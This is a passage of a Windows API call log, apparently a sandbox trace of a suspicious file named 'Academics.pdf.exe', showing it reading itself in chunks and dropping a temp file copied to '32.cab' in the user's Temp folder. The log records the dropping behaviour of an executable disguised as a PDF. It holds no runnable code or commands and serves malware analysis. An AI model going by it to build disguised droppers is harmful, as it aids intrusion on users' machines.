lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.340] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffd8 [0133.340] SetFilePointer (in: hFile=0x160, lDistanceToMove=196548, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffc4 [0133.340] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.341] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffc4 [0133.341] SetFilePointer (in: hFile=0x160, lDistanceToMove=262064, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffb0 [0133.341] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.341] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ffb0 [0133.341] SetFilePointer (in: hFile=0x160, lDistanceToMove=327580, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4ff9c [0133.341] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.341] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5ff9c [0133.341] SetFilePointer (in: hFile=0x160, lDistanceToMove=393096, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5ff88 [0133.341] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.342] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ff88 [0133.342] SetFilePointer (in: hFile=0x160, lDistanceToMove=458612, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ff74 [0133.342] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.342] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ff74 [0133.342] SetFilePointer (in: hFile=0x160, lDistanceToMove=524128, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7ff60 [0133.342] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.342] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8ff60 [0133.342] SetFilePointer (in: hFile=0x160, lDistanceToMove=589644, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8ff4c [0133.342] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.343] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ff4c [0133.343] SetFilePointer (in: hFile=0x160, lDistanceToMove=655160, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ff38 [0133.343] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.343] SetFilePointer (in: hFile=0x160, lDistanceToMove=685588, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa7614 [0133.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1000) returned 0x24b2e00 [0133.343] ReadFile (in: hFile=0x160, lpBuffer=0x24b2e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8aeb4c, lpOverlapped=0x0 | out: lpBuffer=0x24b2e00*, lpNumberOfBytesRead=0x8aeb4c*=0x1000, lpOverlapped=0x0) returned 1 [0133.343] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8beb7c | out: lpSystemTimeAsFileTime=0x8beb7c*(dwLowDateTime=0x59e51d0, dwHighDateTime=0x1d509d7)) [0133.343] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa8614 [0133.343] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/32.cab" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\32.cab")) returned 0xffffffff [0133.343] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/32.cab", lpFindFileData=0x8bebe8 | out: lpFindFileData=0x8bebe8*(dwFileAttributes=0xc0, ftCreationTime.dwLowDateTime=0x8bebf8, ftCreationTime.dwHighDateTime=0x41af1a, ftLastAccessTime.dwLowDateTime=0x25c0abc, ftLastAccessTime.dwHighDateTime=0x8bec38, ftLastWriteTime.dwLowDateTime=0x41e2c6, ftLastWriteTime.dwHighDateTime=0x3, nFileSizeHigh=0x41e2bc, nFileSizeLow=0x6ad1c79f, dwReserved0=0x4900b0, dwReserved1=0x3, cFileName="", cAlternateFileName="")) returned 0xffffffff [0133.344] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8adc5c | out: lpSystemTimeAsFileTime=0x8adc5c*(dwLowDateTime=0x59e51d0, dwHighDateTime=0x1d509d7)) [0133.344] SetFilePointer (in: hFile=0x160, lDistanceToMove=685608, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa7628 [0133.344] ReadFile (in: hFile=0x160, lpBuffer=0x24b2e00, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad720, lpOverlapped=0x0 | out: lpBuffer=0x24b2e00*, lpNumberOfBytesRead=0x8ad720*=0x200, lpOverlapped=0x0) returned 1 [0133.344] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x59e51d0, dwHighDateTime=0x1d509d7)) [0133.344] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x59e51d0, dwHighDateTime=0x1d509d7)) [0133.344] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x59e51d0, dwHighDateTime=0x1d509d7)) [0133.344] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa7828 [0133.344] SetFilePointer (in: hFile=0x160, lDistanceToMove=685749, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa76b5 [0133.344] ReadFile (in: hFile=0x160, lpBuffer=0x24b2e00, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad720, lpOverlapped=0x0 | out: lpBuffer=0x24b2e00*, lpNumberOfBytesRead=0x8ad720*=0x200, lpOverlapped=0x0) returned 1 [0133.344] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa78b5 [0133.344] SetFilePointer (in: hFile=0x160, lDistanceToMove=704599, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xac057 [0133.344] ReadFile (in: hFile=0x160, lpBuffer=0x24b2e00, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad720, lpOverlapped=0x0 | out: lpBuffer=0x24b2e00*, lpNumberOfBytesRead=0x8ad720*=0x200, lpOverlapped=0x0) returned 1 [0133.344] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x59e51d0, dwHighDateTime=0x1d509d7)) [0133.345] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x59e51d0, dwHighDateTime=0x1d509d7)) [0133.345] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad70c | out: lpSystemTimeAsFileTime=0x8ad70c*(dwLowDateTime=0x59e51d0, dwHighDateTime=0x1d509d7)) [0133.345] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8ada70 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0133.345] GetTempFileNameW (in: lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpPrefixString="aut", uUnique=0x0, lpTempFileName=0x8ae130 | out: lpTempFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\autDB22.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\autdb22.tmp")) returned 0xdb22 [0133.345] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\autDB22.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\autdb22.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x8adb44, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0133.346] GetFileType (hFile=0x168) returned 0x1 [0133.346] ReadFile (in: hFile=0x160, lpBuffer=0x8aefc9, nNumberOfBytesToRead=0xb000, lpNumberOfBytesRead=0x8adb80, lpOverlapped=0x0 | out: lpBuffer=0x8aefc9*, lpNumberOfBytesRead=0x8adb80*=0xb000, lpOverlapped=0x0) returned 1 [0133.346] ReadFile (in: hFile=0x160, lpBuffer=0x24b2e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8adb70, lpOverlapped=0x0 | out: lpBuffer=0x24b2e00*, lpNumberOfBytesRead=0x8adb70*=0x1000, lpOverlapped=0x0) returned 1 [0133.348] WriteFile (in: hFile=0x168, lpBuffer=0x8aee50*, nNumberOfBytesToWrite=0xb000, lpNumberOfBytesWritten=0x8ac0e4, lpOverlapped=0x0 | out: lpBuffer=0x8aee50*, lpNumberOfBytesWritten=0x8ac0e4*=0xb000, lpOverlapped=0x0) returned 1 [0133.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1000) returned 0x24b3e08 [0133.350] WriteFile (in: hFile=0x168, lpBuffer=0x24b3e08*, nNumberOfBytesToWrite=0xeef, lpNumberOfBytesWritten=0x8ac0f4, lpOverlapped=0x0 | out: lpBuffer=0x24b3e08*, lpNumberOfBytesWritten=0x8ac0f4*=0xeef, lpOverlapped=0x0) returned 1 [0133.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3e08 | out: hHeap=0x25c0000) returned 1 [0133.350] CloseHandle (hObject=0x168) returned 1 [0133.358] CopyFileW (lpExistingFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\autDB22.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\autdb22.tmp"), lpNewFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/32.cab" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\32.cab"), bFailIfExists=0) returned 1 [0133.363] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\autDB22.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\autdb22.tmp")) returned 1 [0133.364] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/32.cab" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\32.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0133.364] SetFileTime (hFile=0x164, lpCreationTime=0x8adcb8, lpLastAccessTime=0x0, lpLastWriteTime=0x8adcc0) returned 1 [0133.364] CloseHandle (hObject=0x164) returned 1 [0133.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0133.364] CloseHandle (hObject=0x160) returned 1 [0133.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8e50 | out: hHeap=0x25c0000) returned 1 [0133.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0133.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0133.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0133.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f40 | out: hHeap=0x25c0000) returned 1 [0133.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8c88 | out: hHeap=0x25c0000) returned 1 [0133.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0133.365] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0133.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0133.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8c88 [0133.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1068 [0133.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f40 [0133.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0133.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0133.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1068 [0133.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8e50 [0133.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0133.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b0f98 [0133.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8eb0 [0133.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0f98 | out: hHeap=0x25c0000) returned 1 [0133.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0133.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b0f98 [0133.366] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0133.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8e98 [0133.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8ee0 [0133.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8ec8 [0133.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f10 [0133.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8e98 | out: hHeap=0x25c0000) returned 1 [0133.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8e98 [0133.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1048 [0133.366] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0133.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f28 [0133.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0133.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1058 [0133.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1048 | out: hHeap=0x25c0000) returned 1 [0133.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0133.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0f98 | out: hHeap=0x25c0000) returned 1 [0133.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f10 | out: hHeap=0x25c0000) returned 1 [0133.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8ec8 | out: hHeap=0x25c0000) returned 1 [0133.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8e98 | out: hHeap=0x25c0000) returned 1 [0133.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8ee0 | out: hHeap=0x25c0000) returned 1 [0133.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8eb0 | out: hHeap=0x25c0000) returned 1 [0133.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0133.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8e50 | out: hHeap=0x25c0000) returned 1 [0133.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b0f98 [0133.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0133.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8e50 [0133.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0133.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0133.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8e50 | out: hHeap=0x25c0000) returned 1 [0133.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0133.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0f98 | out: hHeap=0x25c0000) returned 1 [0133.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0133.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0133.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1068 [0133.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x24b1068, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 1 [0133.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0133.367] GetLastError () returned 0x0 [0133.368] SetLastError (dwErrCode=0x0) [0133.368] GetLastError () returned 0x0 [0133.368] SetLastError (dwErrCode=0x0) [0133.368] GetLastError () returned 0x0 [0133.368] SetLastError (dwErrCode=0x0) [0133.368] GetLastError () returned 0x0 [0133.368] SetLastError (dwErrCode=0x0) [0133.368] GetLastError () returned 0x0 [0133.368] SetLastError (dwErrCode=0x0) [0133.368] GetLastError () returned 0x0 [0133.368] SetLastError (dwErrCode=0x0) [0133.368] GetLastError () returned 0x0 [0133.368] SetLastError (dwErrCode=0x0) [0133.368] GetLastError () returned 0x0 [0133.369] SetLastError (dwErrCode=0x0) [0133.369] GetLastError () returned 0x0 [0133.369] SetLastError (dwErrCode=0x0) [0133.369] GetLastError () returned 0x0 [0133.369] SetLastError (dwErrCode=0x0) [0133.369] GetLastError () returned 0x0 [0133.369] SetLastError (dwErrCode=0x0) [0133.369] GetLastError () returned 0x0 [0133.369] SetLastError (dwErrCode=0x0) [0133.369] GetLastError () returned 0x0 [0133.369] SetLastError (dwErrCode=0x0) [0133.369] GetLastError () returned 0x0 [0133.369] SetLastError (dwErrCode=0x0) [0133.369] GetLastError () returned 0x0 [0133.369] SetLastError (dwErrCode=0x0) [0133.369] GetLastError () returned 0x0 [0133.369] SetLastError (dwErrCode=0x0) [0133.369] GetLastError () returned 0x0 [0133.370] SetLastError (dwErrCode=0x0) [0133.370] GetLastError () returned 0x0 [0133.370] SetLastError (dwErrCode=0x0) [0133.370] GetLastError () returned 0x0 [0133.370] SetLastError (dwErrCode=0x0) [0133.370] GetLastError () returned 0x0 [0133.370] SetLastError (dwErrCode=0x0) [0133.370] GetLastError () returned 0x0 [0133.370] SetLastError (dwErrCode=0x0) [0133.370] GetLastError () returned 0x0 [0133.370] SetLastError (dwErrCode=0x0) [0133.370] GetLastError () returned 0x0 [0133.370] SetLastError (dwErrCode=0x0) [0133.370] GetLastError () returned 0x0 [0133.370] SetLastError (dwErrCode=0x0) [0133.370] GetLastError () returned 0x0 [0133.370] SetLastError (dwErrCode=0x0) [0133.370] GetLastError () returned 0x0 [0133.371] SetLastError (dwErrCode=0x0) [0133.371] GetLastError () returned 0x0 [0133.371] SetLastError (dwErrCode=0x0) [0133.371] GetLastError () returned 0x0 [0133.371] SetLastError (dwErrCode=0x0) [0133.371] GetLastError () returned 0x0 [0133.371] SetLastError (dwErrCode=0x0) [0133.371] GetLastError () returned 0x0 [0133.371] SetLastError (dwErrCode=0x0) [0133.371] GetLastError () returned 0x0 [0133.371] SetLastError (dwErrCode=0x0) [0133.371] GetLastError () returned 0x0 [0133.371] SetLastError (dwErrCode=0x0) [0133.371] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\academics.pdf.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8beb64, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0133.372] GetFileType (hFile=0x160) returned 0x1 [0133.372] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.372] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0133.372] SetFilePointer (in: hFile=0x160, lDistanceToMove=65516, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffec [0133.372] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.372] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffec [0133.372] SetFilePointer (in: hFile=0x160, lDistanceToMove=131032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffd8 [0133.372] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.373] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffd8 [0133.373] SetFilePointer (in: hFile=0x160, lDistanceToMove=196548, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffc4 [0133.373] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.373] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffc4 [0133.373] SetFilePointer (in: hFile=0x160, lDistanceToMove=262064, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffb0 [0133.373] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.373] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ffb0 [0133.373] SetFilePointer (in: hFile=0x160, lDistanceToMove=327580, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4ff9c [0133.373] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.374] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5ff9c [0133.374] SetFilePointer (in: hFile=0x160, lDistanceToMove=393096, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5ff88 [0133.374] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | 